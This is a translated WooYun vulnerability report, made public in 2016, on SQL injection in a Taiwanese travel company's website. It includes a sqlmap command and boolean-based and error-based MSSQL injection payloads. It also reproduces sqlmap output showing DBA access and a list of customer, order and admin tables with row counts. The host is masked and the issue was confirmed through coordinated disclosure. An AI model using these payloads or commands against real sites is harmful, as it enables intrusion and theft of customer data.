
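Vulnerability summary

Bug ID: wooyun-2015-0153332

Vulnerability title: SQL injection on a 前方旅遊 site (DBA privileges; passwords of 64 system administrators leaked; 78 databases; tens of thousands of account records leaked) (Taiwan region)

Affected vendor: 前方旅遊

Reported by: 路人甲

Submitted: 2015-11-10 16:02

Fixed: 2016-01-11 15:32

Publicly disclosed: 2016-01-11 15:32

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 10

Vulnerability status: Handed over to a third-party partner organization (Hitcon Taiwan Internet vulnerability reporting platform) for handling

Vulnerability source: http://www.wooyun.org; for questions or assistance, contact [email protected]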



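Vulnerability details

Disclosure status:

2015-11-10: Details reported to the vendor; awaiting vendor handling
2015-11-23: Vendor confirmed; details disclosed to the vendor only
2015-12-03: Details disclosed to core white hats and experts in related fields
2015-12-13: Details disclosed to regular white hats
2015-12-23: Details disclosed to intern white hats
2016-01-11: Details disclosed to the public

Brief description:

SQL injection on a 前方旅遊 site (DBA privileges; passwords of 64 system administrators leaked; 78 databases; tens of thousands of account records leaked)

Detailed description:

Address: http://**.**.**.**/About_NewsContent.aspx?ReqID=273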

python sqlmap.py -u "http://**.**.**.**/About_NewsContent.aspx?ReqID=273" -p ReqID --technique=BE --random-agent --batch -D 'Travel' --count

Proof of vulnerability:

---
Parameter: ReqID (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ReqID=273 AND 9136=9136
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: ReqID=273 AND 8890=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(113)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (8890=8890) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(120)+CHAR(118)+CHAR(113)))
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
current user: 'Allen_Travel'
current user is DBA: True
database management system users [64]:
database management system users password hashes:


available databases [78]:


web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
Database: Travel
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| dbo.Order2 | 45693 |
| dbo.syncobj_0x3846453338434136 | 45693 |
| dbo.Account | 24026 |
| dbo.syncobj_0x3230443741444135 | 24026 |
| dbo.AR | 23713 |
| dbo.syncobj_0x3943363837414541 | 23713 |
| dbo.Order1 | 23267 |
| dbo.syncobj_0x3244303138384632 | 23267 |
| dbo.syncobj_0x4134333630313135 | 17564 |
| dbo.Vip | 17564 |
| dbo.Order3 | 2454 |
| dbo.syncobj_0x4245423343344144 | 2454 |
| dbo.DiscussReply | 1822 |
| dbo.syncobj_0x4138303335434636 | 1822 |
| dbo.syncobj_0x3038354637464534 | 1629 |
| dbo.VipData | 1629 |
| dbo.RemittanceNotice | 1274 |
| dbo.syncobj_0x3942384542364443 | 1274 |
| dbo.syncobj_0x3831364133463843 | 1070 |
| dbo.Upfiles | 1070 |
| dbo.syncobj_0x3436303845454633 | 1022 |
| dbo.VIPCRM | 1022 |
| dbo.Shipping | 970 |
| dbo.syncobj_0x4630413642414535 | 970 |
| dbo.Air_OrderDetail | 778 |
| dbo.syncobj_0x4335393530313631 | 778 |
| dbo.Air_OrderCondition | 774 |
| dbo.syncobj_0x3430463435324344 | 774 |
| dbo.DiscussTitle | 769 |
| dbo.syncobj_0x4443363034424434 | 769 |
| dbo.Procurement2 | 669 |
| dbo.syncobj_0x3839413336464637 | 669 |
| dbo.ShipCancel | 643 |
| dbo.syncobj_0x3343303839463143 | 643 |
| dbo.sysarticlecolumns | 602 |
| dbo.Air_OrderPax | 470 |
| dbo.syncobj_0x4431423131353735 | 470 |
| dbo.Air_OrderPnrCodeLog | 457 |
| dbo.syncobj_0x3134383044374142 | 457 |
| dbo.Stock | 432 |
| dbo.syncobj_0x4338324431323333 | 432 |
| dbo.Product2 | 386 |
| dbo.syncobj_0x3935463741384133 | 386 |
| dbo.Air_Order | 383 |
| dbo.syncobj_0x3444393841463239 | 383 |
| dbo.Procurement1 | 274 |
| dbo.syncobj_0x3835323642413636 | 274 |
| dbo.About | 237 |
| dbo.syncobj_0x3245324538363244 | 237 |
| dbo.AP | 206 |
| dbo.syncobj_0x4332423739344444 | 206 |
| dbo.ShipMain | 146 |
| dbo.syncobj_0x4438443935433134 | 146 |
| dbo.syssubscriptions | 124 |
| dbo.SlideImages | 108 |
| dbo.syncobj_0x4337373046303031 | 108 |
| dbo.syncobj_0x3434413639444131 | 68 |
| dbo.Transfer_Account | 68 |
| dbo.StockMain | 66 |
| dbo.syncobj_0x3035394136414330 | 66 |
| dbo.APSub | 64 |
| dbo.syncobj_0x4631304646453242 | 64 |
| dbo.sysarticles | 62 |
| dbo.sysextendedarticlesview | 62 |
| dbo.Product1 | 47 |
| dbo.syncobj_0x3243304343374232 | 47 |
| dbo.OtherPay | 43 |
| dbo.syncobj_0x4137424342343745 | 43 |
| dbo.Supplier | 26 |
| dbo.syncobj_0x3031414131393542 | 26 |
| dbo.City | 23 |
| dbo.syncobj_0x4230424432434333 | 23 |
| dbo.Occupation | 22 |
| dbo.syncobj_0x4444454631423633 | 22 |
| dbo.Marquee | 15 |
| dbo.syncobj_0x3037344437354135 | 15 |
| dbo.Bank | 12 |
| dbo.Prepaid | 12 |
| dbo.syncobj_0x3533453135363134 | 12 |
| dbo.syncobj_0x3833343833433144 | 12 |
| dbo.Admin | 11 |
| dbo.ProcessGroup2 | 11 |
| dbo.syncobj_0x4242464133413534 | 11 |
| dbo.syncobj_0x4531413239333245 | 11 |
| dbo.Dismantling | 10 |
| dbo.syncobj_0x4241323033333843 | 10 |
| dbo.FTransport | 9 |
| dbo.Process | 9 |
| dbo.syncobj_0x3739344641323242 | 9 |
| dbo.syncobj_0x4233314330443338 | 9 |
| dbo.EDU | 7 |
| dbo.syncobj_0x4138393536393036 | 7 |
| dbo.Combination | 6 |
| dbo.Country | 6 |
| dbo.PDType | 6 |
| dbo.ShipReture | 6 |
| dbo.syncobj_0x3231423143394244 | 6 |
| dbo.syncobj_0x3335374138464336 | 6 |
| dbo.syncobj_0x4239454635353836 | 6 |
| dbo.syncobj_0x4241434131304232 | 6 |
| dbo.BTransport | 5 |
| dbo.Contact | 5 |
| dbo.RightAD | 5 |
| dbo.syncobj_0x3239314441384333 | 5 |
| dbo.syncobj_0x4442443645324442 | 5 |
| dbo.syncobj_0x4533393632413344 | 5 |
| dbo.AdminFunction | 4 |
| dbo.syncobj_0x4443364638344635 | 4 |
| dbo.ProcessGroup | 3 |
| dbo.syncobj_0x3531314544354134 | 3 |
| dbo.ProcReture | 2 |
| dbo.RetureMain | 2 |
| dbo.syncobj_0x3441363041414230 | 2 |
| dbo.syncobj_0x3942394535344539 | 2 |
| dbo.ProcCancel | 1 |
| dbo.syncobj_0x4131433636364646 | 1 |
| dbo.syspublications | 1 |
| dbo.sysreplservers | 1 |
+--------------------------------+---------+

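Remediation:

Deploy a WAF.

Copyright notice: When reposting, please credit the source 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 16

Confirmed: 2015-11-23 00:43

Vendor reply:

Thank you for the report

Latest status:

None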